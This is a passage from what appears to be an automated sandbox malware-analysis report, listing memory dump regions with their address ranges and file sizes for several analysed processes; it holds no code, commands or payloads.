                                                                                                                            Filesize

                                                                                                                            600KB

                                                                                                                          • memory/2600-20-0x0000000006120000-0x000000000613A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            104KB

                                                                                                                          • memory/2600-19-0x0000000007310000-0x000000000798A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.5MB

                                                                                                                          • memory/2600-18-0x0000000005C10000-0x0000000005C5C000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            304KB

                                                                                                                          • memory/2600-17-0x0000000005BD0000-0x0000000005BEE000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            120KB

                                                                                                                          • memory/2600-24-0x0000000007F40000-0x00000000084E4000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/2600-2-0x0000000002610000-0x0000000002646000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            216KB

                                                                                                                          • memory/2600-16-0x00000000056E0000-0x0000000005A34000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            3.3MB

                                                                                                                          • memory/2600-3-0x0000000004D60000-0x0000000005388000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.2MB

                                                                                                                          • memory/2600-5-0x0000000005500000-0x0000000005566000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            408KB

                                                                                                                          • memory/3372-117-0x0000000020F50000-0x0000000020F5C000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            48KB

                                                                                                                          • memory/3372-740-0x0000000021920000-0x0000000021964000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            272KB

                                                                                                                          • memory/3372-743-0x00000000219F0000-0x0000000021A66000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            472KB

                                                                                                                          • memory/3372-103-0x0000000070570000-0x00000000705BC000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            304KB

                                                                                                                          • memory/3372-104-0x00000000700C0000-0x0000000070414000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            3.3MB

                                                                                                                          • memory/3372-115-0x0000000020BA0000-0x0000000020C32000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            584KB

                                                                                                                          • memory/3372-710-0x0000000007B90000-0x0000000007B9A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            40KB

                                                                                                                          • memory/3372-709-0x0000000021860000-0x0000000021872000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            72KB

                                                                                                                          • memory/3820-846-0x0000000003400000-0x0000000003992000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4424-889-0x00000000001E0000-0x000000000069A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4.7MB

                                                                                                                          • memory/4424-902-0x00000000001E0000-0x000000000069A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4.7MB

                                                                                                                          • memory/4708-760-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-785-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-793-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-800-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-790-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-802-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-789-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-752-0x0000000000400000-0x0000000000931000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.2MB

                                                                                                                          • memory/4708-788-0x0000000003B10000-0x0000000003C50000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            1.2MB

                                                                                                                          • memory/4708-786-0x0000000004DB0000-0x0000000004DB1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/4708-796-0x0000000003B10000-0x0000000003C50000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            1.2MB

                                                                                                                          • memory/4708-795-0x0000000003B10000-0x0000000003C50000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            1.2MB

                                                                                                                          • memory/4708-794-0x0000000005B40000-0x0000000005B41000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/4708-787-0x0000000003B10000-0x0000000003C50000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            1.2MB

                                                                                                                          • memory/4708-818-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-792-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-753-0x0000000000400000-0x0000000000931000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.2MB

                                                                                                                          • memory/4708-783-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-784-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-781-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-780-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-847-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-757-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-776-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-763-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-761-0x0000000003570000-0x0000000003B02000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4708-758-0x0000000063280000-0x00000000634BE000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            2.2MB

                                                                                                                          • memory/4708-759-0x000000006E600000-0x000000006E69D000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            628KB

                                                                                                                          • memory/4984-6099-0x000001DF16060000-0x000001DF160B6000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            344KB

                                                                                                                          • memory/4984-2614-0x0000000000400000-0x00000000004BA000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            744KB

                                                                                                                          • memory/4984-6098-0x000001DF16050000-0x000001DF16058000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/4984-2615-0x000001DF2E960000-0x000001DF2EA6C000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            1.0MB

                                                                                                                          • memory/5628-90-0x0000000008710000-0x000000000873A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/5628-83-0x0000000007900000-0x000000000790A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            40KB

                                                                                                                          • memory/5628-67-0x0000000006590000-0x00000000065DC000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            304KB

                                                                                                                          • memory/5628-69-0x00000000077B0000-0x00000000077E2000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            200KB

                                                                                                                          • memory/5628-70-0x0000000070570000-0x00000000705BC000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            304KB

                                                                                                                          • memory/5628-71-0x00000000700C0000-0x0000000070414000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            3.3MB

                                                                                                                          • memory/5628-81-0x00000000077F0000-0x000000000780E000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            120KB

                                                                                                                          • memory/5628-82-0x0000000007810000-0x00000000078B3000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            652KB

                                                                                                                          • memory/5628-93-0x0000000008840000-0x000000000885A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            104KB

                                                                                                                          • memory/5628-65-0x0000000005E50000-0x00000000061A4000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            3.3MB

                                                                                                                          • memory/5628-84-0x0000000007A70000-0x0000000007A81000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            68KB

                                                                                                                          • memory/5628-85-0x00000000083D0000-0x000000000841A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            296KB

                                                                                                                          • memory/5628-88-0x0000000008EA0000-0x0000000009062000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            1.8MB

                                                                                                                          • memory/5628-89-0x00000000095A0000-0x0000000009ACC000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.2MB

                                                                                                                          • memory/5628-91-0x0000000008740000-0x0000000008764000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            144KB

                                                                                                                          • memory/5628-92-0x00000000083C0000-0x00000000083CE000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            56KB

                                                                                                                          • memory/6076-875-0x00000256019C0000-0x00000256019C8000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/7872-10977-0x00000000001F0000-0x000000000069F000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            4.7MB